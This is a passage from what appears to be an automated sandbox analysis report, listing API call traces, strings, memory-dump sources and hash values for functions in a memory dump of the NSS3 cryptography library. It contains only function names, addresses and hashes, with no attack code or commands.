                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                APIs
                                                                                • PR_Now.NSS3 ref: 6CFD8C7C
                                                                                  • Part of subcall function 6D079DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DC6
                                                                                  • Part of subcall function 6D079DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DD1
                                                                                  • Part of subcall function 6D079DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D079DED
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFD8CB0
                                                                                • TlsGetValue.KERNEL32 ref: 6CFD8CD1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFD8CE5
                                                                                • PR_Unlock.NSS3(?), ref: 6CFD8D2E
                                                                                • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CFD8D62
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFD8D93
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6D019C5B), ref: 6D019D82
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6D019C5B), ref: 6D019DA9
                                                                                  • Part of subcall function 6D011340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D01136A
                                                                                  • Part of subcall function 6D011340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D01137E
                                                                                  • Part of subcall function 6D011340: PL_ArenaGrow.NSS3(?,6CFAF599,?,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?), ref: 6D0113CF
                                                                                  • Part of subcall function 6D011340: PR_Unlock.NSS3(?,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D01145C
                                                                                • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6D019C5B), ref: 6D019DCE
                                                                                  • Part of subcall function 6D011340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D0113F0
                                                                                  • Part of subcall function 6D011340: PL_ArenaGrow.NSS3(?,6CFAF599,?,?,?,00000000,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6D011445
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,6D019C5B), ref: 6D019DDC
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6D019C5B), ref: 6D019DFE
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6D019C5B), ref: 6D019E43
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6D019C5B), ref: 6D019E91
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                  • Part of subcall function 6D011560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6D00FAAB,00000000), ref: 6D01157E
                                                                                  • Part of subcall function 6D011560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D00FAAB,00000000), ref: 6D011592
                                                                                  • Part of subcall function 6D011560: memset.VCRUNTIME140(?,00000000,?), ref: 6D011600
                                                                                  • Part of subcall function 6D011560: PL_ArenaRelease.NSS3(?,?), ref: 6D011620
                                                                                  • Part of subcall function 6D011560: PR_Unlock.NSS3(?), ref: 6D011639
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                APIs
                                                                                • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CFDDDEC
                                                                                  • Part of subcall function 6D010840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D0108B4
                                                                                • PK11_DigestBegin.NSS3(00000000), ref: 6CFDDE70
                                                                                • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CFDDE83
                                                                                • HASH_ResultLenByOidTag.NSS3(?), ref: 6CFDDE95
                                                                                • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CFDDEAE
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CFDDEBB
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFDDECC
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6D00D9E4,00000000), ref: 6D00DC30
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6D00D9E4,00000000), ref: 6D00DC4E
                                                                                • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6D00D9E4,00000000), ref: 6D00DC5A
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D00DC7E
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D00DCAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Arenamemcpy
                                                                                • String ID:
                                                                                • API String ID: 2632744278-0
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6CFC8C1B
                                                                                • EnterCriticalSection.KERNEL32 ref: 6CFC8C34
                                                                                • PL_ArenaAllocate.NSS3 ref: 6CFC8C65
                                                                                • PR_Unlock.NSS3 ref: 6CFC8C9C
                                                                                • PR_Unlock.NSS3 ref: 6CFC8CB6
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                • String ID: KRAM
                                                                                • API String ID: 4127063985-3815160215
                                                                                APIs
                                                                                • PR_EnterMonitor.NSS3 ref: 6D0C2CA0
                                                                                • PR_ExitMonitor.NSS3 ref: 6D0C2CBE
                                                                                • calloc.MOZGLUE(00000001,00000014), ref: 6D0C2CD1
                                                                                • strdup.MOZGLUE(?), ref: 6D0C2CE1
                                                                                • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6D0C2D27
                                                                                Strings
                                                                                • Loaded library %s (static lib), xrefs: 6D0C2D22
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                • String ID: Loaded library %s (static lib)
                                                                                • API String ID: 3511436785-2186981405
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFBBDCA
                                                                                  • Part of subcall function 6D010FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CFB87ED,00000800,6CFAEF74,00000000), ref: 6D011000
                                                                                  • Part of subcall function 6D010FF0: PR_NewLock.NSS3(?,00000800,6CFAEF74,00000000), ref: 6D011016
                                                                                  • Part of subcall function 6D010FF0: PL_InitArenaPool.NSS3(00000000,security,6CFB87ED,00000008,?,00000800,6CFAEF74,00000000), ref: 6D01102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFBBDDB
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFBBDEC
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01116E
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CFBBE03
                                                                                  • Part of subcall function 6D00FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D008D2D,?,00000000,?), ref: 6D00FB85
                                                                                  • Part of subcall function 6D00FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D00FBB1
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFBBE22
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFBBE30
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFBBE3B
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1821307800-0
                                                                                APIs
                                                                                • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CFA3D77,?,?,6CFA4E1D), ref: 6D0A1C8A
                                                                                • sqlite3_free.NSS3(00000000), ref: 6D0A1CB6
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_mprintf
                                                                                • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                • API String ID: 1840970956-3705377941
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6D01ED6B
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6D01EDCE
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • free.MOZGLUE(00000000,?,?,?,?,6D01B04F), ref: 6D01EE46
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D01EECA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D01EEEA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6D01EEFB
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                • String ID:
                                                                                • API String ID: 3768380896-0
                                                                                APIs
                                                                                  • Part of subcall function 6D045B40: PR_GetIdentitiesLayer.NSS3 ref: 6D045B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D043D3F
                                                                                  • Part of subcall function 6CFBBA90: PORT_NewArena_Util.NSS3(00000800,6D043CAF,?), ref: 6CFBBABF
                                                                                  • Part of subcall function 6CFBBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6D043CAF,?), ref: 6CFBBAD5
                                                                                  • Part of subcall function 6CFBBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6D043CAF,?), ref: 6CFBBB08
                                                                                  • Part of subcall function 6CFBBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6D043CAF,?), ref: 6CFBBB1A
                                                                                  • Part of subcall function 6CFBBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6D043CAF,?), ref: 6CFBBB3B
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D043CCB
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790AB
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790C9
                                                                                  • Part of subcall function 6D079090: EnterCriticalSection.KERNEL32 ref: 6D0790E5
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D079116
                                                                                  • Part of subcall function 6D079090: LeaveCriticalSection.KERNEL32 ref: 6D07913F
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D043CE2
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D043CF8
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D043D15
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D043D2E
                                                                                Similarity
                                                                                • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                • String ID:
                                                                                • API String ID: 4030862364-0
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D00FE08
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D00FE1D
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01116E
                                                                                • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D00FE29
                                                                                • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D00FE3D
                                                                                • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D00FE62
                                                                                • free.MOZGLUE(00000000,?,?,?,?), ref: 6D00FE6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 660648399-0
                                                                                • Opcode ID: 0cf1cba09983196e5a9e498f563e99bf281e155f98d0852e704ab91696f68e74
                                                                                • Instruction ID: 2d748f4880c2754373cf706cc6058fd7c2925cdf39b980df8a3be1892dbaa6aa
                                                                                • Opcode Fuzzy Hash: 0cf1cba09983196e5a9e498f563e99bf281e155f98d0852e704ab91696f68e74
                                                                                • Instruction Fuzzy Hash: 351125B6A08342BBFB009B55DC40B2B7BDCAF14295F058138EA1887212E731E910CB95
                                                                                APIs
                                                                                • PR_Lock.NSS3 ref: 6D0BFD9E
                                                                                  • Part of subcall function 6D079BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CFA1A48), ref: 6D079BB3
                                                                                  • Part of subcall function 6D079BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CFA1A48), ref: 6D079BC8
                                                                                • PR_WaitCondVar.NSS3(000000FF), ref: 6D0BFDB9
                                                                                  • Part of subcall function 6CF9A900: TlsGetValue.KERNEL32(00000000,?,6D1114E4,?,6CF34DD9), ref: 6CF9A90F
                                                                                  • Part of subcall function 6CF9A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CF9A94F
                                                                                • PR_Unlock.NSS3 ref: 6D0BFDD4
                                                                                • PR_Lock.NSS3 ref: 6D0BFDF2
                                                                                • PR_NotifyAllCondVar.NSS3 ref: 6D0BFE0D
                                                                                • PR_Unlock.NSS3 ref: 6D0BFE23
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                • String ID:
                                                                                • API String ID: 3365241057-0
                                                                                • Opcode ID: 427884cee314b9662647f12e3fe49a19ae1bb2029cf5c4752fcf7f656ff65127
                                                                                • Instruction ID: 340d9b5152e45d7668897bdf600bacb1d81a7d55862f03604a550d97631f00a6
                                                                                • Opcode Fuzzy Hash: 427884cee314b9662647f12e3fe49a19ae1bb2029cf5c4752fcf7f656ff65127
                                                                                • Instruction Fuzzy Hash: DE01E5BAD081219BEF044F25FD01A19BA71FB226287114334E934476E2E733DD64C6C1
                                                                                APIs
                                                                                • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CFFFC55
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFFFCB2
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CFFFDB7
                                                                                • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CFFFDDE
                                                                                  • Part of subcall function 6D008800: TlsGetValue.KERNEL32(?,6D01085A,00000000,?,6CFB8369,?), ref: 6D008821
                                                                                  • Part of subcall function 6D008800: TlsGetValue.KERNEL32(?,?,6D01085A,00000000,?,6CFB8369,?), ref: 6D00883D
                                                                                  • Part of subcall function 6D008800: EnterCriticalSection.KERNEL32(?,?,?,6D01085A,00000000,?,6CFB8369,?), ref: 6D008856
                                                                                  • Part of subcall function 6D008800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D008887
                                                                                  • Part of subcall function 6D008800: PR_Unlock.NSS3(?,?,?,?,6D01085A,00000000,?,6CFB8369,?), ref: 6D008899
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                • String ID: pkcs11:
                                                                                • API String ID: 362709927-2446828420
                                                                                • Opcode ID: 116235fc319cd5746b288b6fd6f21eac0f8a4b1b829a2e7d56e9e8606f501ba2
                                                                                • Instruction ID: b64d0a39215038655ffda7486d1d3328405ae166f9e8e9740680df86cc2d2afe
                                                                                • Opcode Fuzzy Hash: 116235fc319cd5746b288b6fd6f21eac0f8a4b1b829a2e7d56e9e8606f501ba2
                                                                                • Instruction Fuzzy Hash: 3151C472A04121ABFB509F65DD41F5E37B5EF41358F150024DE256BAB2EB70E902CBA2
                                                                                APIs
                                                                                • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CF3BE02
                                                                                  • Part of subcall function 6D069C40: memcmp.VCRUNTIME140(?,00000000,6CF3C52B), ref: 6D069D53
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3BE9F
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF3BE89
                                                                                • database corruption, xrefs: 6CF3BE93
                                                                                • %s at line %d of [%.10s], xrefs: 6CF3BE98
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 1135338897-598938438
                                                                                • Opcode ID: 31b2177fe6ff324ab5b50213afd72d2daca91c54204021d8ef17c7efb593204f
                                                                                • Instruction ID: 64f2f29daa4b54bbe3297e53de5d1f66d4d7b76825edf01df9bc9b0c010092c7
                                                                                • Opcode Fuzzy Hash: 31b2177fe6ff324ab5b50213afd72d2daca91c54204021d8ef17c7efb593204f
                                                                                • Instruction Fuzzy Hash: 5F315931A08A65ABC700DF6DC8B4BEBBBA1AF41314B199954EE5C5B6C1D370ED80C7D0
                                                                                APIs
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CFA0BDE), ref: 6CFA0DCB
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,?,6CFA0BDE), ref: 6CFA0DEA
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CFA0BDE), ref: 6CFA0DFC
                                                                                • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CFA0BDE), ref: 6CFA0E32
                                                                                Strings
                                                                                • %s incr => %d (find lib), xrefs: 6CFA0E2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: strrchr$Print_stricmp
                                                                                • String ID: %s incr => %d (find lib)
                                                                                • API String ID: 97259331-2309350800
                                                                                • Opcode ID: 80893f83c8075523f127b4c0c809e52d45b6debe83f3494a89045da1a3feed0c
                                                                                • Instruction ID: 6ff754fec3c436ace5e3d104eeff907f72f35a6029dee79c8c2e489b07f17b2e
                                                                                • Opcode Fuzzy Hash: 80893f83c8075523f127b4c0c809e52d45b6debe83f3494a89045da1a3feed0c
                                                                                • Instruction Fuzzy Hash: F201D472640210DFE6209FA5AC86F17B3ACDF45A09B05446DEA0AD3641E7E2EC15CBA1
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CF49CF2
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CF49D45
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CF49D8B
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CF49DDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: 34fd74b342732f57fd8306da4b1f0ca226c00ddc9132be3d96078dba139b7e29
